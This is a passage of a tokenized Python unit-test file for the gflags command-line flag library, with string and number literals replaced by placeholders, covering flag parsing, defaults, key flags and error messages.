<EOL> self . _ReadFlagsFromFiles , fake_argv , True ) <EOL> def testMethod_flagfiles_NotFound ( self ) : <EOL> """<STR_LIT>""" <EOL> tmp_files = self . _SetupTestFiles ( ) <EOL> fake_cmd_line = ( '<STR_LIT>' <EOL> % tmp_files [ <NUM_LIT:3> ] ) <EOL> fake_argv = fake_cmd_line . split ( '<STR_LIT:U+0020>' ) <EOL> self . assertRaises ( gflags . CantOpenFlagFileError , <EOL> self . _ReadFlagsFromFiles , fake_argv , True ) <EOL> def test_flagfiles_user_path_expansion ( self ) : <EOL> """<STR_LIT>""" <EOL> fake_flagfile_item_style_1 = '<STR_LIT>' <EOL> fake_flagfile_item_style_2 = '<STR_LIT>' <EOL> expected_results = os . path . expanduser ( '<STR_LIT>' ) <EOL> test_results = self . flag_values . ExtractFilename ( fake_flagfile_item_style_1 ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> test_results = self . flag_values . ExtractFilename ( fake_flagfile_item_style_2 ) <EOL> self . assertEqual ( expected_results , test_results ) <EOL> def test_no_touchy_non_flags ( self ) : <EOL> """<STR_LIT>""" <EOL> fake_argv = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> argv = self . flag_values ( fake_argv ) <EOL> self . assertEqual ( argv , fake_argv [ : <NUM_LIT:1> ] + fake_argv [ <NUM_LIT:2> : ] ) <EOL> def test_parse_flags_after_args_if_using_gnu_getopt ( self ) : <EOL> """<STR_LIT>""" <EOL> self . flag_values . UseGnuGetOpt ( ) <EOL> fake_argv = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> argv = self . flag_values ( fake_argv ) <EOL> self . assertEqual ( argv , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_SetDefault ( self ) : <EOL> """<STR_LIT>""" <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . flag_values . UnitTestMessage1 , '<STR_LIT>' ) <EOL> self . assertEqual ( self . flag_values [ '<STR_LIT>' ] . default_as_str , <EOL> "<STR_LIT>" ) <EOL> self . flag_values ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . flag_values . UnitTestMessage1 , '<STR_LIT>' ) <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault ( None ) <EOL> self . assertEqual ( self . flag_values . UnitTestNumber , None ) <EOL> self . assertEqual ( self . flag_values [ '<STR_LIT>' ] . default_as_str , None ) <EOL> self . flag_values ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . flag_values . UnitTestNumber , <NUM_LIT> ) <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault ( <NUM_LIT:0> ) <EOL> self . assertEqual ( self . flag_values . UnitTestNumber , <NUM_LIT:0> ) <EOL> self . assertEqual ( self . flag_values [ '<STR_LIT>' ] . default_as_str , "<STR_LIT>" ) <EOL> self . flag_values ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . flag_values . UnitTestNumber , <NUM_LIT> ) <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault ( "<STR_LIT>" ) <EOL> self . assertEqual ( self . flag_values . UnitTestMessage1 , "<STR_LIT>" ) <EOL> self . assertEqual ( self . flag_values [ '<STR_LIT>' ] . default_as_str , "<STR_LIT>" ) <EOL> self . flag_values ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . flag_values . UnitTestMessage1 , "<STR_LIT>" ) <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault ( False ) <EOL> self . assertEqual ( self . flag_values . UnitTestBoolFlag , False ) <EOL> self . assertEqual ( self . flag_values [ '<STR_LIT>' ] . default_as_str , <EOL> "<STR_LIT>" ) <EOL> self . flag_values ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . flag_values . UnitTestBoolFlag , True ) <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault ( '<STR_LIT>' ) <EOL> self . assertEqual ( self . flag_values . UnitTestList , [ '<STR_LIT:4>' , '<STR_LIT:5>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . flag_values [ '<STR_LIT>' ] . default_as_str , "<STR_LIT>" ) <EOL> self . flag_values ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . flag_values . UnitTestList , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertRaises ( gflags . IllegalFlagValue , <EOL> self . flag_values [ '<STR_LIT>' ] . SetDefault , '<STR_LIT>' ) <EOL> self . assertRaises ( gflags . IllegalFlagValue , <EOL> self . flag_values . SetDefault , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> class FlagsParsingTest ( googletest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . flag_values = gflags . FlagValues ( ) <EOL> def testMethod_ShortestUniquePrefixes ( self ) : <EOL> """<STR_LIT>""" <EOL> gflags . DEFINE_string ( '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> gflags . DEFINE_string ( '<STR_LIT:abc>' , '<STR_LIT>' , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> gflags . DEFINE_string ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> gflags . DEFINE_boolean ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_boolean ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_boolean ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> gflags . DEFINE_boolean ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , flag_values = self . flag_values ) <EOL> shorter_flags = self . flag_values . ShortestUniquePrefixes ( <EOL> self . flag_values . FlagDict ( ) ) <EOL> expected_results = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:a>' : '<STR_LIT:a>' , <EOL> '<STR_LIT:abc>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:z>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> for name , shorter in expected_results . iteritems ( ) : <EOL> self . assertEquals ( shorter_flags [ name ] , shorter ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT:a>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT:abc>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> def test_twodasharg_first ( self ) : <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> flag_values = self . flag_values ) <EOL> argv = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> self . assertEqual ( '<STR_LIT>' , self . flag_values . twodash_name ) <EOL> self . assertEqual ( argv [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> def test_twodasharg_middle ( self ) : <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> flag_values = self . flag_values ) <EOL> argv = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> self . assertEqual ( '<STR_LIT>' , self . flag_values . twodash2_name ) <EOL> self . assertEqual ( '<STR_LIT>' , self . flag_values . twodash2_blame ) <EOL> self . assertEqual ( argv [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> def test_onedasharg_first ( self ) : <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> flag_values = self . flag_values ) <EOL> argv = ( '<STR_LIT>' , <EOL> '<STR_LIT:->' , <EOL> '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> self . assertEqual ( argv [ <NUM_LIT:1> ] , '<STR_LIT:->' ) <EOL> def test_unrecognized_flags ( self ) : <EOL> gflags . DEFINE_string ( "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT>" , flag_values = self . flag_values ) <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag , e : <EOL> assert e . flagname == '<STR_LIT>' <EOL> assert e . flagvalue == '<STR_LIT>' <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag , e : <EOL> assert e . flagname == '<STR_LIT:w>' <EOL> assert e . flagvalue == '<STR_LIT>' <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag , e : <EOL> assert e . flagname == '<STR_LIT>' <EOL> assert e . flagvalue == '<STR_LIT>' <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag , e : <EOL> assert e . flagname == '<STR_LIT>' <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag : <EOL> assert e . flagname == '<STR_LIT>' <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag , e : <EOL> assert e . flagname == '<STR_LIT>' <EOL> try : <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . flag_values ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . FlagsError : <EOL> pass <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = self . flag_values ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> class NonGlobalFlagsTest ( googletest . TestCase ) : <EOL> def test_nonglobal_flags ( self ) : <EOL> """<STR_LIT>""" <EOL> nonglobal_flags = gflags . FlagValues ( ) <EOL> gflags . DEFINE_string ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , nonglobal_flags ) <EOL> argv = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = nonglobal_flags ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert nonglobal_flags [ '<STR_LIT>' ] . value == '<STR_LIT>' <EOL> def test_unrecognized_nonglobal_flags ( self ) : <EOL> """<STR_LIT>""" <EOL> nonglobal_flags = gflags . FlagValues ( ) <EOL> argv = ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> try : <EOL> argv = nonglobal_flags ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . UnrecognizedFlag , e : <EOL> assert e . flagname == '<STR_LIT>' <EOL> pass <EOL> argv = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> argv = nonglobal_flags ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> def test_create_flag_errors ( self ) : <EOL> e = gflags . FlagsError ( ) <EOL> e = gflags . FlagsError ( "<STR_LIT:message>" ) <EOL> e = gflags . DuplicateFlag ( ) <EOL> e = gflags . DuplicateFlag ( "<STR_LIT:message>" ) <EOL> e = gflags . IllegalFlagValue ( ) <EOL> e = gflags . IllegalFlagValue ( "<STR_LIT:message>" ) <EOL> e = gflags . UnrecognizedFlag ( ) <EOL> e = gflags . UnrecognizedFlag ( "<STR_LIT:message>" ) <EOL> def testFlagValuesDelAttr ( self ) : <EOL> """<STR_LIT>""" <EOL> default_value = '<STR_LIT>' <EOL> flag_values = gflags . FlagValues ( ) <EOL> gflags . DEFINE_string ( '<STR_LIT>' , default_value , '<STR_LIT>' , <EOL> flag_values = flag_values ) <EOL> self . assertEquals ( flag_values . delattr_foo , default_value ) <EOL> flag_obj = flag_values [ '<STR_LIT>' ] <EOL> self . assertTrue ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> del flag_values . delattr_foo <EOL> self . assertFalse ( '<STR_LIT>' in flag_values . FlagDict ( ) ) <EOL> self . assertFalse ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:3> , '<STR_LIT>' , <EOL> flag_values = flag_values ) <EOL> del flag_values . delattr_foo <EOL> self . assertFalse ( '<STR_LIT>' in flag_values . RegisteredFlags ( ) ) <EOL> gflags . DEFINE_string ( '<STR_LIT>' , default_value , '<STR_LIT>' , <EOL> short_name = '<STR_LIT>' , flag_values = flag_values ) <EOL> flag_obj = flag_values [ '<STR_LIT>' ] <EOL> self . assertTrue ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> del flag_values . x5 <EOL> self . assertTrue ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> del flag_values . delattr_bar <EOL> self . assertFalse ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> gflags . DEFINE_string ( '<STR_LIT>' , default_value , '<STR_LIT>' , <EOL> short_name = '<STR_LIT>' , flag_values = flag_values ) <EOL> flag_obj = flag_values [ '<STR_LIT>' ] <EOL> self . assertTrue ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> del flag_values . delattr_bar <EOL> self . assertTrue ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> del flag_values . x5 <EOL> self . assertFalse ( flag_values . _FlagIsRegistered ( flag_obj ) ) <EOL> self . assertFalse ( '<STR_LIT>' in flag_values . RegisteredFlags ( ) ) <EOL> self . assertFalse ( '<STR_LIT>' in flag_values . RegisteredFlags ( ) ) <EOL> class KeyFlagsTest ( googletest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . flag_values = gflags . FlagValues ( ) <EOL> def _GetNamesOfDefinedFlags ( self , module , flag_values ) : <EOL> """<STR_LIT>""" <EOL> return [ f . name for f in flag_values . _GetFlagsDefinedByModule ( module ) ] <EOL> def _GetNamesOfKeyFlags ( self , module , flag_values ) : <EOL> """<STR_LIT>""" <EOL> return [ f . name for f in flag_values . _GetKeyFlagsForModule ( module ) ] <EOL> def _AssertListsHaveSameElements ( self , list_1 , list_2 ) : <EOL> list_1 = list ( list_1 ) <EOL> list_1 . sort ( ) <EOL> list_2 = list ( list_2 ) <EOL> list_2 . sort ( ) <EOL> self . assertListEqual ( list_1 , list_2 ) <EOL> def testKeyFlags ( self ) : <EOL> self . assertListEqual ( self . _GetNamesOfKeyFlags ( module_foo , self . flag_values ) , <EOL> [ ] ) <EOL> self . assertListEqual ( self . _GetNamesOfKeyFlags ( module_bar , self . flag_values ) , <EOL> [ ] ) <EOL> self . assertListEqual ( self . _GetNamesOfDefinedFlags ( module_foo , <EOL> self . flag_values ) , <EOL> [ ] ) <EOL> self . assertListEqual ( self . _GetNamesOfDefinedFlags ( module_bar , <EOL> self . flag_values ) , <EOL> [ ] ) <EOL> module_foo . DefineFlags ( flag_values = self . flag_values ) <EOL> try : <EOL> for module in [ module_foo , module_bar ] : <EOL> self . _AssertListsHaveSameElements ( <EOL> self . flag_values . _GetFlagsDefinedByModule ( module ) , <EOL> self . flag_values . _GetKeyFlagsForModule ( module ) ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfDefinedFlags ( module , self . flag_values ) , <EOL> module . NamesOfDefinedFlags ( ) ) <EOL> module_foo . DeclareKeyFlags ( flag_values = self . flag_values ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfDefinedFlags ( module_foo , self . flag_values ) , <EOL> module_foo . NamesOfDefinedFlags ( ) ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfKeyFlags ( module_foo , self . flag_values ) , <EOL> module_foo . NamesOfDeclaredKeyFlags ( ) ) <EOL> module_foo . DeclareExtraKeyFlags ( flag_values = self . flag_values ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfKeyFlags ( module_foo , self . flag_values ) , <EOL> module_foo . NamesOfDeclaredKeyFlags ( ) + <EOL> module_foo . NamesOfDeclaredExtraKeyFlags ( ) ) <EOL> finally : <EOL> module_foo . RemoveFlags ( flag_values = self . flag_values ) <EOL> def testKeyFlagsWithNonDefaultFlagValuesObject ( self ) : <EOL> fv = gflags . FlagValues ( ) <EOL> self . assertListEqual ( <EOL> self . _GetNamesOfKeyFlags ( module_bar , fv ) , <EOL> [ ] ) <EOL> self . assertListEqual ( <EOL> self . _GetNamesOfDefinedFlags ( module_bar , fv ) , <EOL> [ ] ) <EOL> module_bar . DefineFlags ( flag_values = fv ) <EOL> self . _AssertListsHaveSameElements ( <EOL> fv . _GetFlagsDefinedByModule ( module_bar ) , <EOL> fv . _GetKeyFlagsForModule ( module_bar ) ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfDefinedFlags ( module_bar , fv ) , <EOL> module_bar . NamesOfDefinedFlags ( ) ) <EOL> main_module = gflags . _GetMainModule ( ) <EOL> names_of_flags_defined_by_bar = module_bar . NamesOfDefinedFlags ( ) <EOL> flag_name_0 = names_of_flags_defined_by_bar [ <NUM_LIT:0> ] <EOL> flag_name_2 = names_of_flags_defined_by_bar [ <NUM_LIT:2> ] <EOL> gflags . DECLARE_key_flag ( flag_name_0 , flag_values = fv ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfKeyFlags ( main_module , fv ) , <EOL> [ flag_name_0 ] ) <EOL> gflags . DECLARE_key_flag ( flag_name_2 , flag_values = fv ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfKeyFlags ( main_module , fv ) , <EOL> [ flag_name_0 , flag_name_2 ] ) <EOL> gflags . DECLARE_key_flag ( '<STR_LIT>' , flag_values = fv ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfKeyFlags ( main_module , fv ) , <EOL> [ flag_name_0 , flag_name_2 , '<STR_LIT>' ] ) <EOL> gflags . ADOPT_module_key_flags ( module_bar , fv ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfKeyFlags ( main_module , fv ) , <EOL> names_of_flags_defined_by_bar + [ '<STR_LIT>' ] ) <EOL> gflags . ADOPT_module_key_flags ( gflags , flag_values = fv ) <EOL> self . _AssertListsHaveSameElements ( <EOL> self . _GetNamesOfKeyFlags ( main_module , fv ) , <EOL> names_of_flags_defined_by_bar + [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def testMainModuleHelpWithKeyFlags ( self ) : <EOL> expected_help = '<STR_LIT>' <EOL> self . assertMultiLineEqual ( expected_help , self . flag_values . MainModuleHelp ( ) ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:1> , <EOL> '<STR_LIT>' , <EOL> flag_values = self . flag_values ) <EOL> try : <EOL> main_module_int_fg_help = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected_help += "<STR_LIT>" % ( sys . argv [ <NUM_LIT:0> ] , main_module_int_fg_help ) <EOL> self . assertMultiLineEqual ( expected_help , <EOL> self . flag_values . MainModuleHelp ( ) ) <EOL> gflags . DECLARE_key_flag ( '<STR_LIT>' , flag_values = self . flag_values ) <EOL> self . assertMultiLineEqual ( expected_help , <EOL> self . flag_values . MainModuleHelp ( ) ) <EOL> module_foo . DefineFlags ( flag_values = self . flag_values ) <EOL> self . assertMultiLineEqual ( expected_help , <EOL> self . flag_values . MainModuleHelp ( ) ) <EOL> gflags . DECLARE_key_flag ( '<STR_LIT>' , flag_values = self . flag_values ) <EOL> tmod_foo_bool_help = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected_help += "<STR_LIT:\n>" + tmod_foo_bool_help <EOL> self . assertMultiLineEqual ( expected_help , <EOL> self . flag_values . MainModuleHelp ( ) ) <EOL> gflags . DECLARE_key_flag ( '<STR_LIT>' , flag_values = self . flag_values ) <EOL> tmod_bar_z_help = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected_help = ( "<STR_LIT>" % <EOL> ( sys . argv [ <NUM_LIT:0> ] , <EOL> main_module_int_fg_help , <EOL> tmod_bar_z_help , <EOL> tmod_foo_bool_help ) ) <EOL> self . assertMultiLineEqual ( self . flag_values . MainModuleHelp ( ) , <EOL> expected_help ) <EOL> finally : <EOL> self . flag_values . __delattr__ ( '<STR_LIT>' ) <EOL> module_foo . RemoveFlags ( flag_values = self . flag_values ) <EOL> def test_ADOPT_module_key_flags ( self ) : <EOL> self . assertRaises ( gflags . FlagsError , <EOL> gflags . ADOPT_module_key_flags , <EOL> '<STR_LIT>' ) <EOL> class GetCallingModuleTest ( googletest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_GetCallingModule ( self ) : <EOL> self . assertEqual ( gflags . _GetCallingModule ( ) , sys . argv [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( <EOL> module_foo . GetModuleName ( ) , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> module_bar . GetModuleName ( ) , <EOL> '<STR_LIT>' ) <EOL> code = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> exec code <EOL> exec code in { } <EOL> exec code in dict ( vars ( self ) ) <EOL> global_dict = { } <EOL> exec code in global_dict <EOL> self . assertEqual ( global_dict [ '<STR_LIT>' ] , <EOL> sys . argv [ <NUM_LIT:0> ] ) <EOL> global_dict = { } <EOL> module_bar . ExecuteCode ( code , global_dict ) <EOL> self . assertEqual ( <EOL> global_dict [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> def test_GetCallingModuleWithIteritemsError ( self ) : <EOL> orig_sys_modules = sys . modules <EOL> class SysModulesMock ( dict ) : <EOL> def __init__ ( self , original_content ) : <EOL> dict . __init__ ( self , original_content ) <EOL> def iteritems ( self ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> sys . modules = SysModulesMock ( orig_sys_modules ) <EOL> try : <EOL> self . assertEqual ( gflags . _GetCallingModule ( ) , sys . argv [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( <EOL> module_foo . GetModuleName ( ) , <EOL> '<STR_LIT>' ) <EOL> finally : <EOL> sys . modules = orig_sys_modules <EOL> class FlagsErrorMessagesTest ( googletest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . flag_values = gflags . FlagValues ( ) <EOL> self . flag_values . UseGnuGetOpt ( False ) <EOL> def testIntegerErrorText ( self ) : <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , lower_bound = <NUM_LIT:1> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , lower_bound = <NUM_LIT:0> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' , upper_bound = - <NUM_LIT:1> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' , upper_bound = <NUM_LIT:0> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' , lower_bound = <NUM_LIT:4> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' , upper_bound = <NUM_LIT:4> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , lower_bound = <NUM_LIT:0> , <EOL> upper_bound = <NUM_LIT> , flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , lower_bound = - <NUM_LIT:1> , <EOL> upper_bound = <NUM_LIT:1> , flag_values = self . flag_values ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( 